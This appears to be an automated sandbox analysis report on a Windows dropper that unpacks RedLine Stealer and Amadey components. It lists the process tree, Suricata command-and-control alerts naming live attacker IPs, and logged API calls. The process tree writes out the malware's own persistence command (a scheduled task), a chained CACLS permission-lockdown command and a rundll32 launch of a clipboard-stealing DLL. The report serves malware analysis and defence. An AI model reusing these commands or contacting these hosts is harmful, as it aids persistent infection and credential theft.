Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	June 26, 2023, 9:52 a.m.	June 26, 2023, 9:57 a.m.

Size	507.3KB
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	`e8dc42f50270cc92cfafe4a52fe2c77d`
SHA256	`3a4069c200464490db5367c20c7705efd98e9d2b7813e1aa93dd9e22a678c2e8`
CRC32	`034A69AE`
ssdeep	`6144:lgPU0q6Zwh24HVvsrlnpFsLNO2XnzAxzNszbPQ5xzTgiDjEMiZEd1kvUQJgiMH8D:IU03zvsLHXnz4hmbIrXgiDj8vUQkcPg2`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description)

fotod95.exe "C:\Users\test22\AppData\Local\Temp\fotod95.exe"
1680
- y0759327.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\y0759327.exe
  2136
  - k0740620.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\k0740620.exe
    2180
  - l7175925.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\l7175925.exe
    2644
- n0441467.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\n0441467.exe
  2904
  - rugen.exe "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe"
    3012
    - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
      1684
    - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rugen.exe" /P "test22:N"&&CACLS "rugen.exe" /P "test22:R" /E&&echo Y|CACLS "..\200f691d32" /P "test22:N"&&CACLS "..\200f691d32" /P "test22:R" /E&&Exit
      2152
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        912
      - cacls.exe CACLS "rugen.exe" /P "test22:N"
        2404
      - cacls.exe CACLS "rugen.exe" /P "test22:R" /E
        2276
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2728
      - cacls.exe CACLS "..\200f691d32" /P "test22:N"
        1668
      - cacls.exe CACLS "..\200f691d32" /P "test22:R" /E
        1896
    - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      1232
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
77.91.68.63	Active	Moloch
83.97.73.131	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043233	ET MALWARE RedLine Stealer TCP CnC net.tcp Init	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 83.97.73.131:19071 -> 192.168.56.103:49165	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.68.63:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 77.91.68.63:80	2044695	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M1	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.68.63:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.68.63:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 83.97.73.131:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.68.63:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 77.91.68.63:80 -> 192.168.56.103:49180	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.68.63:80 -> 192.168.56.103:49180	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.68.63:80 -> 192.168.56.103:49180	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 26, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 26, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 26, 2023, 9:52 a.m.			0	0
IsDebuggerPresent June 26, 2023, 9:52 a.m.			0	0
IsDebuggerPresent June 26, 2023, 9:52 a.m.			0	0
IsDebuggerPresent June 26, 2023, 9:52 a.m.			0	0
IsDebuggerPresent June 26, 2023, 9:54 a.m.			0	0

Command line console output was observed (50 out of 82 events)

Time & API	Arguments	Status	Return
WriteConsoleA June 26, 2023, 9:52 a.m.	buffer: alice sosalpbrqwzjkakjsak console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:52 a.m.	buffer: alice sosalpbrqwzjkakjsak console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:52 a.m.	buffer: alice sosalpbrqwzjkakjsak console_handle: 0x00000007	1	1
WriteConsoleW June 26, 2023, 9:53 a.m.	buffer: SUCCESS: The scheduled task "rugen.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW June 26, 2023, 9:53 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW June 26, 2023, 9:53 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 26, 2023, 9:53 a.m.	buffer: u console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (17 events)

Time & API	Arguments	Status	Return
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060d908 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060d908 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060d908 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060d908 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060d988 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060d988 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060d888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060d888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060d888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060d888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060d888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060d908 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060d908 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060db08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060e248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060e248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 26, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060e108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 26, 2023, 9:52 a.m.		1	1	0

One or more processes crashed (14 events)

Time & API	Arguments	Status
__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0x209d329 0x209d12b 0x2097710 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x209d460 registers.esp: 35516324 registers.edi: 35516376 registers.eax: 0 registers.ebp: 35516388 registers.edx: 6245128 registers.ebx: 35517828 registers.esi: 39462164 registers.ecx: 0	1
__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0xa7e82b0 0xa7e4224 0xa7e3aba 0xa7e398d 0xa7e2243 0xa7e13d9 0x209d9ff 0x2097855 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7e82f3 registers.esp: 35514852 registers.edi: 35515196 registers.eax: 0 registers.ebp: 35514860 registers.edx: 0 registers.ebx: 35517828 registers.esi: 40134484 registers.ecx: 41260780	1
__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0xa7e82b0 0xa7e4224 0xa7e3aba 0xa7e39a5 0xa7e2243 0xa7e13d9 0x209d9ff 0x2097855 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7e82f3 registers.esp: 35514852 registers.edi: 35515196 registers.eax: 0 registers.ebp: 35514860 registers.edx: 0 registers.ebx: 35517828 registers.esi: 40134484 registers.ecx: 42565488	1
__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0xa7e82b0 0xa7e4224 0xa7e3aba 0xa7e39a5 0xa7e2243 0xa7e13d9 0x209d9ff 0x2097855 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7e82f3 registers.esp: 35514852 registers.edi: 35515196 registers.eax: 0 registers.ebp: 35514860 registers.edx: 0 registers.ebx: 35517828 registers.esi: 40134484 registers.ecx: 40025768	1
__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0xa7e82b0 0xa7e8dbe 0xa7e8679 0xa7e398d 0xa7e252c 0xa7e13d9 0x209d9ff 0x2097855 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7e82f3 registers.esp: 35514828 registers.edi: 35515220 registers.eax: 0 registers.ebp: 35514836 registers.edx: 0 registers.ebx: 35517828 registers.esi: 39059588 registers.ecx: 41334608	1
__exception__ June 26, 2023, 9:53 a.m.	stacktrace: 0xa7e82b0 0xa7e8dbe 0xa7e8679 0xa7e39a5 0xa7e252c 0xa7e13d9 0x209d9ff 0x2097855 0x2096f0b 0x2093c6b 0x20935d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7e82f3 registers.esp: 35514828 registers.edi: 35515220 registers.eax: 0 registers.ebp: 35514836 registers.edx: 0 registers.ebx: 35517828 registers.esi: 39059588 registers.ecx: 42681360	1
